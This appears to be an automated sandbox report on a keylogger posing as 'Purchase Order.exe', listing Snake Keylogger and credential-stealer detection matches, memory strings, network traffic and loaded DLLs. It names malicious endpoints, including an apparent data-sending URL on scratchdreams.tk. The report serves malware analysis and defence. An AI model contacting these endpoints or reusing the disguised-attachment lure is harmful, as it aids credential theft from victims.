            Source: Purchase Order.exe, 00000000.00000002.1733547969.000000000447E000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000002.00000002.4124971142.00000000032C4000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000002.00000002.4123792564.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: Purchase Order.exe, 00000002.00000002.4124971142.0000000003380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/102.129.152.231
            Source: Purchase Order.exe, 00000002.00000002.4124971142.00000000033BC000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000002.00000002.4124971142.0000000003357000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000002.00000002.4124971142.00000000033AD000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000002.00000002.4124971142.0000000003365000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000002.00000002.4124971142.0000000003373000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000002.00000002.4124971142.0000000003303000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000002.00000002.4124971142.0000000003380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/102.129.152.231$
            Source: Purchase Order.exe, 00000000.00000002.1733547969.000000000447E000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000002.00000002.4124971142.0000000003201000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000002.00000002.4124971142.00000000033CA000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000002.00000002.4123792564.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://scratchdreams.tk
            Source: Purchase Order.exe, 00000002.00000002.4124971142.00000000033CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://scratchdreams.tk/_send_.php?TS
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
            Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
            Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
            Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
            Source: unknownHTTPS traffic detected: 104.21.27.85:443 -> 192.168.2.4:49750 version: TLS 1.2

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 0.2.Purchase Order.exe.456bca8.9.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 0.2.Purchase Order.exe.456bca8.9.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 0.2.Purchase Order.exe.456bca8.9.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 0.2.Purchase Order.exe.456bca8.9.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 0.2.Purchase Order.exe.454b488.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 0.2.Purchase Order.exe.454b488.7.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 0.2.Purchase Order.exe.454b488.7.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 0.2.Purchase Order.exe.454b488.7.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 2.2.Purchase Order.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 2.2.Purchase Order.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 2.2.Purchase Order.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 2.2.Purchase Order.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 0.2.Purchase Order.exe.456bca8.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 0.2.Purchase Order.exe.456bca8.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 0.2.Purchase Order.exe.456bca8.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 0.2.Purchase Order.exe.454b488.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 0.2.Purchase Order.exe.454b488.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 0.2.Purchase Order.exe.454b488.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 00000002.00000002.4123792564.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 00000002.00000002.4123792564.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 00000000.00000002.1733547969.000000000447E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 00000000.00000002.1733547969.000000000447E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: Process Memory Space: Purchase Order.exe PID: 6576, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: Process Memory Space: Purchase Order.exe PID: 6576, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: Process Memory Space: Purchase Order.exe PID: 7048, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: Process Memory Space: Purchase Order.exe PID: 7048, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
            Initial sample is a PE file and has a suspicious name
            Source: initial sampleStatic PE information: Filename: Purchase Order.exe
            Source: C:\Users\user\Desktop\Purchase Order.exeProcess Stats: CPU usage > 49%
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 0_2_0190D5BC0_2_0190D5BC
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 0_2_053007400_2_05300740
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 0_2_05305BE80_2_05305BE8
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 0_2_05304A300_2_05304A30
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 0_2_058697D80_2_058697D8
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 0_2_058697680_2_05869768
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 0_2_094B78280_2_094B7828
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 0_2_094BB1680_2_094BB168
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 0_2_094B78180_2_094B7818
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 0_2_094BEA400_2_094BEA40
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 0_2_094BEA500_2_094BEA50
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 0_2_094B3AC80_2_094B3AC8
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 0_2_094B3AD80_2_094B3AD8
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 0_2_094BDDA80_2_094BDDA8
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 0_2_094BB1580_2_094BB158
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 0_2_094BE1D20_2_094BE1D2
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 0_2_094BE1E00_2_094BE1E0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 0_2_094B62400_2_094B6240
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 0_2_094B622F0_2_094B622F
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 0_2_094BE6180_2_094BE618
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_016661682_2_01666168
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_0166C1F02_2_0166C1F0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_0166B3882_2_0166B388
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_0166C4D02_2_0166C4D0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_0166C7B22_2_0166C7B2
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_016668E02_2_016668E0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_016698B82_2_016698B8
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_01664B312_2_01664B31
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_0166FA102_2_0166FA10
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_0166CA922_2_0166CA92
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_0166EDF02_2_0166EDF0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_0166BF102_2_0166BF10
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_016621A82_2_016621A8
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_0166E3002_2_0166E300
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_0166E3102_2_0166E310
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_0166B5522_2_0166B552
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_016635CA2_2_016635CA
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_0166BC082_2_0166BC08
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_05DB36882_2_05DB3688
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_05DB7BA82_2_05DB7BA8
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_05DB82782_2_05DB8278
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_05DBD5C02_2_05DBD5C0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_05DBD5B02_2_05DBD5B0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_05DB0D502_2_05DB0D50
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_05DB0D602_2_05DB0D60
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_05DBCD102_2_05DBCD10
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_05DBCD012_2_05DBCD01
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_05DB04902_2_05DB0490
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_05DB04A02_2_05DB04A0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_05DBC4502_2_05DBC450
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_05DBC4602_2_05DBC460
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_05DBF4182_2_05DBF418
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_05DBF4282_2_05DBF428
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_05DBEFD02_2_05DBEFD0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_05DBEFC12_2_05DBEFC1
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_05DBBFF82_2_05DBBFF8
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_05DBB7582_2_05DBB758
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_05DBB7482_2_05DBB748
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_05DBE7102_2_05DBE710
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_05DBE7202_2_05DBE720
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_05DB36782_2_05DB3678
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_05DBDE702_2_05DBDE70
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_05DBDE612_2_05DBDE61
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_05DB71F42_2_05DB71F4
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_05DBD1582_2_05DBD158
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_05DB817E2_2_05DB817E
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_05DBD1682_2_05DBD168
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_05DB09002_2_05DB0900
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_05DB08F12_2_05DB08F1
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_05DBF8802_2_05DBF880
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_05DBC8B82_2_05DBC8B8
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_05DBC8A82_2_05DBC8A8
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_05DB00402_2_05DB0040
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_05DBF8712_2_05DBF871
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_05DBC0082_2_05DBC008
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_05DB00072_2_05DB0007
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_05DBBBB02_2_05DBBBB0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_05DBBBA02_2_05DBBBA0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_05DBEB782_2_05DBEB78
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_05DBEB682_2_05DBEB68
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_05DBB3002_2_05DBB300
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_05DBE2C82_2_05DBE2C8
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_05DBB2EF2_2_05DBB2EF
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_05DBE2B82_2_05DBE2B8
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_05DBDA182_2_05DBDA18
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_05DBDA092_2_05DBDA09
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_05DB72002_2_05DB7200
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_06E9B6E82_2_06E9B6E8
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_06E9D6702_2_06E9D670
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_06E9AA582_2_06E9AA58
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_06E986082_2_06E98608
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_06E9C3882_2_06E9C388
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_06E9B0A02_2_06E9B0A0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_06E98C512_2_06E98C51
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_06E9D0282_2_06E9D028
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_06E9A4082_2_06E9A408
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_06E9C9D82_2_06E9C9D8
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_06E911A02_2_06E911A0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_06E9BD382_2_06E9BD38
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_06E95EC82_2_06E95EC8
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_06E9B6D82_2_06E9B6D8
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_06E9F2A02_2_06E9F2A0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_06E95EB82_2_06E95EB8
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_06E9D6612_2_06E9D661
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_06E95A602_2_06E95A60
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_06E95A702_2_06E95A70
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_06E9F2732_2_06E9F273
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_06E9AA482_2_06E9AA48
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_06E956092_2_06E95609
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_06E986022_2_06E98602
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_06E956182_2_06E95618
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_06E9A3FA2_2_06E9A3FA
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_06E96BC12_2_06E96BC1
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_06E96BD02_2_06E96BD0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_06E933A82_2_06E933A8
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_06E933B82_2_06E933B8
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_06E9676A2_2_06E9676A
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_06E967782_2_06E96778
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_06E9C3782_2_06E9C378
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_06E963202_2_06E96320
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_06E937302_2_06E93730
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_06E963112_2_06E96311
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_06E908E02_2_06E908E0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_06E908F02_2_06E908F0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_06E978F02_2_06E978F0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_06E974A82_2_06E974A8
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_06E904882_2_06E90488
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_06E904982_2_06E90498
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_06E9B0902_2_06E9B090
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_06E974972_2_06E97497
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_06E970492_2_06E97049
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_06E900402_2_06E90040
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_06E970502_2_06E97050
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_06E9D0212_2_06E9D021
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_06E900272_2_06E90027
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_06E944302_2_06E94430
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_06E928072_2_06E92807
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_06E928182_2_06E92818
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_06E9C9C82_2_06E9C9C8
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_06E981A02_2_06E981A0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_06E981B02_2_06E981B0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_06E9518A2_2_06E9518A
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_06E951982_2_06E95198
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_06E911912_2_06E91191
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_06E90D482_2_06E90D48
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_06E97D482_2_06E97D48
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_06E97D582_2_06E97D58
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_06E90D392_2_06E90D39
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_06E9BD362_2_06E9BD36
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_06E979002_2_06E97900
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 2_2_06E9B6E82_2_06E9B6E8
            Source: Purchase Order.exe, 00000000.00000002.1732825265.00000000032A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs Purchase Order.exe
            Source: Purchase Order.exe, 00000000.00000000.1663089517.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamecJZX.exe> vs Purchase Order.exe
            Source: Purchase Order.exe, 00000000.00000002.1737532738.00000000094C0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs Purchase Order.exe
            Source: Purchase Order.exe, 00000000.00000002.1732825265.0000000003301000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs Purchase Order.exe
            Source: Purchase Order.exe, 00000000.00000002.1730661740.00000000013BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Purchase Order.exe
            Source: Purchase Order.exe, 00000000.00000002.1733547969.000000000447E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs Purchase Order.exe
            Source: Purchase Order.exe, 00000000.00000002.1733547969.000000000447E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs Purchase Order.exe
            Source: Purchase Order.exe, 00000002.00000002.4123792564.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs Purchase Order.exe
            Source: Purchase Order.exe, 00000002.00000002.4123928440.00000000012F7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs Purchase Order.exe
            Source: Purchase Order.exeBinary or memory string: OriginalFilenamecJZX.exe> vs Purchase Order.exe
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Purchase Order.exeSection loaded: dpapi.dllJump to behavior
            Source: Purchase Order.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
